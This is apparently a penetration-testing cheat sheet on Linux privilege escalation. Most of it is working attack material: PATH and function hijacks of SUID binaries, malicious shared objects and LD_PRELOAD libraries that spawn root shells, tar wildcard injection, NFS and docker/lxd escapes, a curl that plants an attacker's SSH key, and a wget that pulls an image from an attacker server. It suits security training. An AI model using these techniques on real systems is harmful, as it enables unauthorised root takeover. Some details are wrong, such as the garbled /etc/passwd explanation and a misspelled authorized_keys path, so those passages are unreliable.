# Linux ## Introduction This section contains a set of techniques that can be used to perform privilege escalation on Linux systems. ## Tools This subsection contains valuable tools to identify potential privilege escalation vectors. * [Linpeas](https://raw.githubusercontent.com/carlospolop/PEASS-ng/master/linPEAS/linpeas.sh): Search for possible paths to escalate privileges on Linux/Unix\*/MacOS hosts. * [LinEnum](https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh): Scripted Local Linux Enumeration & Privilege Escalation Checks. * [LinuxExploitSuggester](https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh): Detects known vulnerabilities in the Linux kernel. * [Linuxprivchecker](https://github.com/sleventyeleven/linuxprivchecker): Enumerate basic system info and search for common privilege escalation vectors such as writable files, misconfigurations, clear-text passwords and applicable exploits. * [PsPy](https://github.com/DominicBreuker/pspy/): Monitor Linux processes without root permissions * **Local Exploit Suggester**: Metasploit module (`post/multi/recon/local_exploit_suggester`) for meterpreter sessions enumerates the system looking for potential privilege escalation vectors. ## SUIDs Files SUID file permission allows users to run an executable with the system permissions of the executable's owner or group. Find SUIDs files with the following commands: ```bash find / -perm -u=s -type f -exec ls -la {} + 2>/dev/null find / -perm /4000 2>/dev/null ``` Once, the SUID file has been detected, look for it on [GTFobins](https://gtfobins.github.io/#+suid) where you can find several ways to exploit the binary, escalating privileges. ### Absolute path There might be a case where a SUID binary executes a program indicating the whole path. ```bash user@pwnbox:~$ strings /usr/local/bin/LaunchApache [...] /usr/sbin/service apache2 start ``` You can export a function named as the whole path command, obtaining a shell as the suid user. ```bash user@pwnbox:~$ function /usr/sbin/service() { /bin/bash -p; } user@pwnbox:~$ export -f /usr/sbin/service user@pwnbox:~$ /usr/local/bin/LaunchApache root@debian:~# id ``` ### Relative path If there is a SUID file that executes a command with a relative path, as you can see below, an attacker can change the PATH to run a malicious file. ```bash user@pwnbox:~$ ls -la script -rwsr-xr-x 1 root root 1003 Jun 4 2021 script user@pwnbox:~$ ltrace ./script setuid(0)= -1 setgid(0)= -1 system("ls") ``` In order to exploit the vulnerability, look at this example. ```bash user@pwnbox:~$ echo -e '#!/bin/bash\nbash -p' > /tmp/ls user@pwnbox:~$ chmod +x /tmp/ls user@pwnbox:~$ PATH=/tmp:$PATH user@pwnbox:~$ echo $PATH /tmp:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games user@machine:~$ ./script root@machine:~# ``` ### Shared Object Injection When a binary is executed, it will seek to load the necessary objects. You can use **strace** in order to track the needed shared objects. If a shared object is not found, you can create a malicious object to spawn a shell. ```bash user@pwnbox:~$ find / -type f -perm -04000 -ls 2>/dev/null 816078 12 -rwsr-sr-x 1 root staff 9861 May 14 2017 /usr/local/bin/suid user@pwnbox:~$ strace /usr/local/bin/suid 2>&1 | grep -i -E "open|access|no such file" [...] access("/etc/suid-debug", F_OK) = -1 ENOENT (No such file or directory) open("/lib/libc.so.6", O_RDONLY) = 3 open("/home/user/.config/libcalc.so", O_RDONLY) = -1 ENOENT (No such file or directory) ``` Because you have got write permissions on the user's home directory, you can create a `libcalc.so` file. ```bash user@pwnbox:~$ cat libcalc.c #include #include static void inject() __attribute__((constructor)); void inject() { setuid(0); system("/bin/bash -p"); } user@pwnbox:~$ mkdir /home/user/.config user@pwnbox:~$ gcc -shared -o /home/user/.config/libcalc.so -fPIC ./libcalc.c TCM@debian:~$ /usr/local/bin/suid Calculating something, please wait... bash-4.1# id uid=0(root) gid=1000(user) egid=50(staff) groups=0(root),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),1000(user) ``` ## SUDO Thanks to sudo, you can execute some binaries or commands as the user-specified. Through [GTFobins](https://gtfobins.github.io/#+sudo) you can obtain the way to escalate privileges depending on the command. ```bash user@pwnbox:~$ cat /etc/sudoers user@pwnbox:~$ sudo -s # Execute a shell as root user@pwnbox:~$ sudo -l User user may run the following commands on this host: (root) NOPASSWD: /usr/bin/vim ``` In order to specify the user, you need to provide the flag `-u`; by default, the user will be root. ### LD\_PRELOAD **LD\_PRELOAD** is an optional environmental variable containing one or more paths to shared libraries or shared objects. The loader will load before any other shared library, including the C runtime library (libc.so). ```bash user@pwnbox:~$ sudo -l Matching Defaults entries for user on this host: env_reset, env_keep+=LD_PRELOAD User user may run the following commands on this host: (root) NOPASSWD: /usr/bin/vim ``` You can escalate privileges if you can execute a program with sudo and the LD\_PRELOAD environment variable is kept. ```bash user@pwnbox:~$ cat pre.c #include #include #include void _init() { unsetenv("LD_PRELOAD"); setgid(0); setuid(0); system("/bin/bash"); } user@pwnbox:~$ gcc -fPIC -shared -o pre.so pre.c -nostartfiles user@pwnbox:~$ sudo LD_PRELOAD=pre.so vim ``` ## /etc/passwd If you have got write permission in the `/etc/passwd` file, then you can add your own password to the root user. This works because the system checks the password in `/etc/passwd` rather than in `/etc/passwd`. ```bash -rw-rw-r-- 1 root user 2694 Mar 6 2020 /etc/passwd ``` To create the password, run the following command. ```bash openssl passwd -1 -salt [salt] [password] [...] root:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash ``` Then, modify `/etc/passwd` and log in as root. ## /etc/shadow ### Read permissions If you can read the files `/etc/shadow` and `/etc/passwd`, then you can create an unshadowed file allowing you to crack the stored hashes. ```bash unshadow > unshadowed.txt john unshadowed.txt -w= ``` ### Write permissions You can use the same method shown on the \`\`/etc/shadow\` section to escalate privileges. ## SSH Keys ### authorized\_keys If you have got write permission to any **authorized\_keys** file, you could append your own SSH public key into it, allowing you to gain access to the machine through SSH. ```bash find / -name authorized_keys 2> /dev/null curl http:///.ssh/id_rsa.pub >> ~/.ssh/authotized_keys ``` ### id\_rsa Might exist some users' SSH private keys stored in the system. ```bash find / -name id_rsa 2> /dev/null grep -iRl "private key" / 2>/dev/null ``` Once found them, you can obtain access as the user through SSH. ```bash chmod 400 id_rsa ssh -i id_rsa user@ ``` ## Crontabs There can be commands or files executed every specific time that an attacker can modify in order to execute arbitrary commands or files. You can use the command `cat /etc/crontab` to view what cron jobs are scheduled. ```bash user@pwnbox:~$ cat /etc/crontab # m h dom mon dow user command */5 * * * * root /home/user/script.sh ``` However, enumerating the `/etc/crontab` file might not always work due to the lack of privileges, or maybe it will appear empty, but there might be contrab jobs. So, you can use [pspy](https://github.com/DominicBreuker/pspy) looking for cronjobs. ## Capabilities Linux capabilities provide some root privileges to a process, just as SUID does but more granularly. There are several ways to exploit these [capabilities](https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/), but in this subsection will only appear how to exploit the `cap_setuid` capability. ```bash # List user capabilities user@pwnbox:~$ capsh --print # Find files with capabilities user@pwnbox:~$ getcap -r / 2>/dev/null /usr/bin/python2.6 = cap_setuid+ep /usr/bin/perl5.26.1 = cap_setuid+ep user@pwnbox:~$ /usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")' user@pwnbox:~$ /usr/bin/perl5.26.1 -e 'use POSIX qw(setuid); POSIX::setuid(0); exec "/bin/sh";' ``` ## Wildcards There might be Linux commands executed with elevated privileges that use wildcards. In this example, you will see how to exploit the wildcard vulnerability for the **tar** binary. However, there are more ways to exploit this vulnerability as you can see here. * [hackingarticles.in](https://www.hackingarticles.in/exploiting-wildcard-for-privilege-escalation/) * [materials.rangeforce.com](https://materials.rangeforce.com/tutorial/2019/11/08/Linux-PrivEsc-Wildcard/) ```bash user@pwnbox:~$ cat /usr/local/bin/compress.sh #!/bin/sh cd /home/user tar czf /tmp/backup.tar.gz * ``` For the command **tar**, we can exploit it with the following commands. ```bash user@pwnbox:~$ echo "cp /bin/bash /tmp && chmod +s /tmp/bash" > shell.sh user@pwnbox:~$ echo "" > --checkpoint=1 user@pwnbox:~$ echo "" > "--checkpoint-action=exec=sh shell.sh" ``` Once the script is executed you will have a root SUID bash file. **Note**: Remember to execute it like this: `/tmp/bash -p`. ## NFS (no\_root\_squash) By default in Root Squashing is enabled in the NFS service, preventing any user who has access to the NFS share from gaining root access to the NFS volume. However, if disabled, it would allow you to create a SUID file, allowing a remote user to connect to the system as root. As can be seen in the configuration no\_root\_squash is disabled. ``` cappucino@polonfs:~$ cat /etc/exports [...] /home *(rw,no_root_squash) ``` Hence, following the instructions of this example, you can escalate privileges. ``` kali@kali:~$ sudo mount -t nfs 10.10.181.37:home /tmp/mount -nolock cappucino@polonfs:~$ cp /bin/bash . kali@kali:/tmp/mount/cappucino$ sudo chown root bash kali@kali:/tmp/mount/cappucino$ sudo chmod +s bash cappucino@polonfs:~$ ls -la -rwsr-sr-x 1 root cappucino 1113504 Jul 15 13:07 bash cappucino@polonfs:~$ ./bash -p bash-4.4# id uid=1000(cappucino) gid=1000(cappucino) euid=0(root) ``` If `bash -p` does not work, use the following method: ```bash echo 'int main() { setgid(0); setuid(0); system("/bin/bash"); return 0; }' > x.c gcc -static x.c -o x sudo chown root x sudo chmod u+s x -bash-4.2$ ./x bash-4.2# id uid=0(root) gid=0(root) groups=0(root) ``` ## Containers If you can run any **docker** or **lxd**, then you can create a container mounting the host file system, accessing every file as root. ### Docker ```bash docker images docker run -v /:/mnt --rm -it chroot /mnt sh ``` ### Lxd Usually, there are no images installed on the system, so you need to build it manually and then transfer it to the target hosts. ```bash # Attacker cd /tmp/ git clone https://github.com/saghul/lxd-alpine-builder.git; cd lxd-alpine-builder/ sudo ./build-alpine python -m SimpleHTTPServer 80 # Victim wget /alpine.tar.gz lxc image import ./alpine.tar.gz --alias myalpine lxc image list #List images lxc init myalpine ignite -c security.privileged=true lxc config device add privesc mydevice disk source=/ path=/mnt/root recursive=true lxc start privesc lxc exec privesc /bin/sh ``` ## Kernel Exploits This subsection contains a list of the most common kernel exploits you can find on a Linux system. In order to know what to use you can execute the following command or the script [Linux-exploiot-suggester](https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh). ```bash uname -a ``` * RDS (CVE-2010-3904) **<= 2.6.36-rc8**: [Link](https://www.exploit-db.com/exploits/15285/) * FULL NELSONN (CVE-2010-4258) **<= 2.6.37**: [Link](https://www.exploit-db.com/exploits/15704/) * MEMPODIPPER (CVE-2012-0056) \[ **2.6.39**, **3.2.2** ]: [Link](https://www.exploit-db.com/exploits/18411) * DirtyCow (CVE-2016-5195) **<= 3.19.0-73.8**: [Link](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs) * Polkit’s pkexec(CVE-2021-4034): [Link](https://github.com/arthepsy/CVE-2021-4034) ## References * [Linux - Privilege Escalation \[PayloadAllTheThings\]](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md)